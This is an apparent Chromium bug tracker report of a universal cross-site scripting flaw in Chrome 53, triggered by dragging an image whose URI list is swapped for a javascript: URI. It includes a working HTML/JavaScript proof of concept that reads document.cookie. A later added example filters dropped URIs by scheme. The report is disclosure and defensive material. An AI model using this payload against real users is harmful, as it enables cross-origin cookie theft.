uxss via drag/drop of JavaScript URI
Reported by
m1x...@gmail.com,
Nov 18 2016
Issue description

UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36

Steps to reproduce the problem:
1. Browse to the URL
2. Click on the button
3. Drag the image

What is the expected behavior?

Demo: https://youtu.be/E45Hf14bnYs

POC:
<button id="qbutt">Click me first</button><br>
<img src="https://security.dianrong.com/static/img/logo@1xnew.png" id="qimg"/>
<script>
// Keep the image invisible until the button has been clicked.
qimg.style.setProperty('opacity','0.0');
var f;
qbutt.onclick=function(){
  qimg.style.setProperty('opacity','1.0');
  qbutt.disabled='true';
  // Open a second window from a data: URL and keep a reference to it.
  f=open('data:text/html,<head><title>Drag n Drop HERE!!</title><link rel="prerender" href="http://www.google.com/"></head><body>go back to the main page</body>');
};
// Replace the dragged image's URI list with a javascript: URI.
document.addEventListener("dragstart", function(event) {
  event.dataTransfer.setData("text/uri-list", "javascript:alert(document.cookie)");
});
// When the drag leaves this window near its left edge, navigate the opened window.
window.ondragleave=function(e){
  if(e.offsetX<10){window.f.location=('http://www.google.com/');}
};
</script>

What went wrong?
uxss

Did this work before? N/A

Chrome version: 53.0.2785.143 Channel: n/a
OS Version: OS X 10.12.1
Flash Version: Shockwave Flash 23.0 r0
Feb 25 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by elawrence@chromium.org, Nov 18 2016
Mergedinto: 639750
Status: Duplicate (was: Unconfirmed)
Summary: uxss via drag/drop of JavaScript URI (was: Chrome for MacOS uxss)
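
As an added example (not part of the report, and not Chromium's fix for this issue): one way application code that acts on dropped text/uri-list data can refuse javascript: and other non-web schemes before navigating. The function names and the sample payload are constructed for illustration.

```javascript
// Added example, not from the report. Names and sample data are constructed.
const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

// Constructed text/uri-list payload: one good URL plus entries to reject.
const SAMPLE_URI_LIST = [
  "# constructed sample",
  "https://example.com/a",
  "javascript:alert(document.cookie)",
  " JaVaScRiPt:alert(1)",
  "java\tscript:alert(1)",
  "data:text/html,hi",
  "not a url",
].join("\r\n");

// text/uri-list (RFC 2483): one URI per line, "#" lines are comments.
function parseUriList(text) {
  return String(text)
    .split(/\r\n|\n|\r/)
    .filter((line) => line.trim() !== "" && !line.startsWith("#"));
}

// Parse with the URL constructor before checking the scheme, so the check
// sees what a navigation would see: case is folded, leading spaces are
// stripped and embedded tabs are removed.
function classifyDroppedUri(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch {
    return { raw, allowed: false, reason: "unparseable" };
  }
  if (!ALLOWED_PROTOCOLS.has(url.protocol)) {
    return { raw, allowed: false, reason: "scheme " + url.protocol };
  }
  return { raw, allowed: true, href: url.href };
}

// Only entries that pass the allowlist are returned for navigation.
function safeDropTargets(uriListText) {
  return parseUriList(uriListText)
    .map(classifyDroppedUri)
    .filter((r) => r.allowed)
    .map((r) => r.href);
}

console.log(safeDropTargets(SAMPLE_URI_LIST));
```

A plain string-prefix test on the raw value would let the mixed-case and tab-containing entries through, which is why the scheme is read from the parsed URL.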